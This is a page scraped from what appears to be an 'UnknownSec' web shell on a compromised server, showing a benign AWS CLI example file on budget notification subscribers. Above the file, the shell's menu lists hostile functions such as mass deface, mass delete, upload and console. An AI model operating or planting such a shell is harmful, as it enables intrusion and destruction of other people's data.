shell bypass 403
UnknownSec Shell
:
/
snap
/
aws-cli
/
current
/
aws
/
dist
/
awscli
/
examples
/
budgets
/ [
drwxr-xr-x
]
upload
mass deface
mass delete
console
info server
name :
describe-subscribers-for-notification.rst
**To retrieve the subscribers for a budget notification** This example retrieves the subscribers for a Cost and Usage budget notification. Command:: aws budgets describe-subscribers-for-notification --account-id 111122223333 --budget-name "Example Budget" --notification NotificationType=ACTUAL,ComparisonOperator=GREATER_THAN,Threshold=80,ThresholdType=PERCENTAGE --max-results 5 Output:: { "Subscribers": [ { "SubscriptionType": "EMAIL", "Address": "example2@example.com" }, { "SubscriptionType": "EMAIL", "Address": "example@example.com" } ] }
© 2026 UnknownSec